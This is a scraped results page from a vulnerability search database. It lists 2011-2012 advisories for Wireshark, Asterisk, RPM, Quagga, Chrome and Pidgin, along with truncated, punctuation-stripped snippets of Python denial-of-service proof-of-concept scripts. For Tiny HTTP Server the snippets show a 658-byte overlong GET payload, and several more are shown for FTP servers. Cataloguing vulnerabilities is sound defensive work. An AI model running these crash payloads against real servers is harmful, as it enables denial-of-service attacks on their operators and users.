Lucene search
+L

2267 matches found

RedHat Linux
RedHat Linux
added 2012/04/23 4:41 p.m.17 views

Wireshark: Use-after-free causes heap-based buffer overflow in X.509if dissector

The X.509if dissector in Wireshark 1.2.x before 1.2.16 and 1.4.x before 1.4.5 does not properly initialize certain global variables, which allows remote attackers to cause a denial of service application crash via a crafted .pcap file...

4.3CVSS5.8AI score0.01812EPSS
SaveExploits1References4
FreeBSD
FreeBSD
added 2012/04/23 12:00 a.m.31 views

asterisk -- multiple vulnerabilities

Asterisk project reports: Remote Crash Vulnerability in SIP Channel Driver Heap Buffer Overflow in Skinny Channel Driver Asterisk Manager User Unauthorized Shell Access...

6.5CVSS6.5AI score0.02721EPSS
SaveExploits0References3
OSV
OSV
added 2012/04/11 10:39 a.m.5 views

DEBIAN-CVE-2012-0041

The dissectpacket function in epan/packet.c in Wireshark 1.4.x before 1.4.11 and 1.6.x before 1.6.5 allows remote attackers to cause a denial of service application crash via a long packet in a capture file, as demonstrated by an airopeek file...

4.3CVSS6.8AI score0.02007EPSS
SaveExploits1References1
OSV
OSV
added 2012/04/11 10:39 a.m.5 views

DEBIAN-CVE-2012-0043

Buffer overflow in the reassemblemessage function in epan/dissectors/packet-rlc.c in the RLC dissector in Wireshark 1.4.x before 1.4.11 and 1.6.x before 1.6.5 allows remote attackers to cause a denial of service application crash or possibly execute arbitrary code via a series of fragmented RLC...

5.8CVSS8.2AI score0.0312EPSS
SaveExploits1References1
OSV
OSV
added 2012/04/05 1:25 p.m.16 views

AZL-44247 CVE-2012-0250 affecting package quagga 1.2.4-16

Buffer overflow in the OSPFv2 implementation in ospfd in Quagga before 0.99.20.1 allows remote attackers to cause a denial of service daemon crash via a Link State Update aka LS Update packet containing a network-LSA link-state advertisement for which the data-structure length is smaller than the...

3.3CVSS7.5AI score0.01301EPSS
SaveExploits0References1
UbuntuCve
UbuntuCve
added 2012/04/03 12:00 a.m.24 views

CVE-2012-0815

The headerVerifyInfo function in lib/header.c in RPM before 4.9.1.3 allows remote attackers to cause a denial of service crash and possibly execute arbitrary code via a negative value in a region offset of a package header, which is not properly handled in a numeric range comparison...

6.8CVSS7.2AI score0.04281EPSS
SaveExploits0References2
Tenable Nessus
Tenable Nessus
added 2012/03/22 12:00 a.m.32 views

Asterisk SRTP Video Stream Negotiation Remote Crash (AST-2012-001)

According to the version in its SIP banner, the version of Asterisk running on the remote host is potentially affected by a vulnerability that could allow a remote attacker to crash the server. The vulnerability can be triggered by attempting to negotiate a secure video stream when it has not bee...

4.3CVSS5.5AI score0.02497EPSS
SaveExploits1References2
zdt
zdt
added 2012/03/20 12:00 a.m.16 views

PeerFTP Server <=v4.01 Remote Crash PoC

Exploit for windows platform in category dos / poc !/usr/bin/python PeerFTP Server \n" %sys.argv0 sys.exit def checkDefaultUserusername,password: if username == '': username = "anonymous" if password == '': password = "email protected" else: pass return username,password def createUser: username ...

7AI score
SaveExploits0
exploitpack
exploitpack
added 2012/03/20 12:00 a.m.11 views

PeerFTP Server 4.01 - Remote Crash (PoC)

PeerFTP Server 4.01 - Remote Crash PoC !/usr/bin/python PeerFTP Server \n" %sys.argv0 sys.exit def checkDefaultUserusername,password: if username == '': username = "anonymous" if password == '': password = "[email protected]" else: pass return username,password def createUser: username =...

7.5AI score
SaveExploits0
Packet Storm
Packet Storm
added 2012/03/20 12:00 a.m.20 views

PeerFTP Server 4.01 Denial Of Service

!/usr/bin/python PeerFTP Server \n" %sys.argv0 sys.exit def checkDefaultUserusername,password: if username == '': username = "anonymous" if password == '': password = "[email protected]" else: pass return username,password def createUser: username = rawinput"! Insert username default: anonymous ...

7.4AI score
SaveExploits0
Exploit DB
Exploit DB
added 2012/03/20 12:00 a.m.23 views

PeerFTP Server 4.01 - Remote Crash (PoC)

!/usr/bin/python PeerFTP Server \n" %sys.argv0 sys.exit def checkDefaultUserusername,password: if username == '': username = "anonymous" if password == '': password = "[email protected]" else: pass return username,password def createUser: username = rawinput"! Insert username default: anonymous ...

5.3AI score
SaveExploits0
zdt
zdt
added 2012/03/19 12:00 a.m.14 views

Telnet-Ftp Server <= v1.218 Remote Crash PoC

Exploit for windows platform in category dos / poc !/usr/bin/python Telnet-Ftp Server \n" %sys.argv0 sys.exit def checkDefaultUserusername,password: if username == '' and password == '': username = "anonymous" password = "email protected" else: pass return username,password def createUser: userna...

7AI score
SaveExploits0
Tenable Nessus
Tenable Nessus
added 2012/03/16 12:00 a.m.16 views

FreeBSD : asterisk -- multiple vulnerabilities (0d530174-6eef-11e1-afd6-14dae9ebcf89)

Asterisk project reports : Stack Buffer Overflow in HTTP Manager Remote Crash Vulnerability in Milliwatt Application %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The descriptive text and package checks in this plugin were extracted from the FreeBSD VuXML database : Copyright 2003-2018...

7AI score
SaveExploits0References3
FreeBSD
FreeBSD
added 2012/03/15 12:00 a.m.22 views

asterisk -- multiple vulnerabilities

Asterisk project reports: Stack Buffer Overflow in HTTP Manager Remote Crash Vulnerability in Milliwatt Application...

1.8AI score
SaveExploits0References2
Exploit DB
Exploit DB
added 2012/02/25 12:00 a.m.21 views

Tiny HTTP Server 1.1.9 - Remote Crash (PoC)

!/usr/bin/python Tiny HTTP Server \n" %sys.argv0 sys.exit payload = "X" 658 try: print "\n! Connecting to %s ..." %sys.argv1 httpServ = httplib.HTTPConnectionsys.argv1 , intsys.argv2 httpServ.connect print "! Sending payload..." httpServ.request'GET', "/" + strpayload print "! Exploit succeed...

7.8CVSS5.2AI score0.02629EPSS
SaveExploits2
zdt
zdt
added 2012/02/25 12:00 a.m.23 views

Tiny HTTP Server <=v1.1.9 Remote Crash PoC

Exploit for windows platform in category dos / poc !/usr/bin/python Tiny HTTP Server \n" %sys.argv0 sys.exit payload = "X" 658 try: print "\n! Connecting to %s ..." %sys.argv1 httpServ = httplib.HTTPConnectionsys.argv1 , intsys.argv2 httpServ.connect print "! Sending payload..."...

7AI score
SaveExploits0
exploitpack
exploitpack
added 2012/02/25 12:00 a.m.16 views

Tiny HTTP Server 1.1.9 - Remote Crash (PoC)

Tiny HTTP Server 1.1.9 - Remote Crash PoC !/usr/bin/python Tiny HTTP Server \n" %sys.argv0 sys.exit payload = "X" 658 try: print "\n! Connecting to %s ..." %sys.argv1 httpServ = httplib.HTTPConnectionsys.argv1 , intsys.argv2 httpServ.connect print "! Sending payload..." httpServ.request'GET', "/"...

7.4AI score
SaveExploits0
Packet Storm
Packet Storm
added 2012/02/25 12:00 a.m.28 views

Tiny HTTP Server 1.1.9 Crash

!/usr/bin/python Tiny HTTP Server \n" %sys.argv0 sys.exit payload = "X" 658 try: print "\n! Connecting to %s ..." %sys.argv1 httpServ = httplib.HTTPConnectionsys.argv1 , intsys.argv2 httpServ.connect print "! Sending payload..." httpServ.request'GET', "/" + strpayload print "! Exploit succeed...

7.4AI score
SaveExploits0
ATTACKERKB
ATTACKERKB
added 2012/02/16 8:55 p.m.4 views

CVE-2011-3024

Google Chrome before 17.0.963.56 allows remote attackers to cause a denial of service application crash via an empty X.509 certificate...

4.3CVSS5.6AI score0.00742EPSS
SaveExploits1References5
RedHat Linux
RedHat Linux
added 2011/12/14 6:54 p.m.12 views

pidgin: SILC remote crash on channel messages

The silcchannelmessage function in ops.c in the SILC protocol plugin in libpurple in Pidgin before 2.10.1 does not perform the expected UTF-8 validation on message data, which allows remote attackers to cause a denial of service application crash via a crafted message, a different vulnerability...

5CVSS5.9AI score0.036EPSS
SaveExploits0References4
Rows per page
Query Builder